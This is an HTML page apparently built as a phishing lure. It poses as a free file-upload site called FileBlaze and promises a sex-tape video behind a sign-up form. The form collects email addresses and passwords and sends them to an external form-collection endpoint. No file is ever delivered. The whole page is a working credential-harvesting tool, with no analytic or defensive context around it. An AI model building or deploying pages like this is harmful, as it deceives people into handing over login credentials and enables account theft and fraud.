<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>FileBlaze - Free unlimited file upload</title>
</head>
<body>
    <img class="logo" src="/assets/images/logo.png" alt="logo">
    <div class="bodyContainer">
        <form class="signup" action="https://getform.io/f/ce00271a-3eb8-4d60-ad25-c2c86110ec96" method="POST">
            <h1>Sign up to view</h1>
            <h5>babes-sextape.mov</h5>
            <input class="formInput" type="email" name="email" id="email" placeholder="Email">
            <input class="formInput" type="password" name="password" id="password" placeholder="Password">
            <input class="formInput" type="password" name="passwordConfirm" id="passwordConfirm" placeholder="Confirm Password">
            <button type="submit" class="submitButton">Sign Up</button>
        </form>
    </div>
    <div class="gradient"></div>
</body>
<style>
* {
    padding: 0;
    margin: 0;
    border: 0;
    font-family: Arial, Helvetica, sans-serif;
}

body {
    background: url(https://images.pexels.com/photos/2089373/pexels-photo-2089373.jpeg);
}

.gradient {
    position: absolute;
    background-color: rgba(255,255,255,0.5);
    width: 100%;
    height: 100vh;
    z-index: 10;
    top: 0;
}

.logo {
    z-index: 101;
    position: absolute;
    top: 0;
    right: 50%;
    left: 50%;
    width: 400px;
    margin-left: -200px;
    height: auto;
    margin-top: 50px;
}

.bodyContainer {
    display: flex;
    height: 100vh;
    width: auto;
    align-items: center;
    justify-content: center;
}

h1 {
    color: #fff;
}

h5 {
    margin-bottom: 20px;
    color: rgba(255,255,255,0.8);
}

.signup {
    z-index: 101;
    background: linear-gradient(212.54deg, #AB0048 0%, #FD8900 108.78%);
    padding: 20px;
    display: flex;
    flex-direction: column;
    width: 300px;
    border-radius: 4px;
}

.formInput {
    border: 3px #fff solid;
    padding: 4px;
    margin: 10px 0;
    background-color: rgba(255, 255, 255, 0.8);
    border-radius: 2px;
}

.submitButton {
    width: 80px;
    padding: 4px;
    font-weight: 700;
    color: #000;
}

.submitButton:hover {
    color: #fff;
    width: 80px;
    padding: 4px;
    font-weight: 700;
    background-color: rgba(255,255,255,0.2)
}
</style>
</html>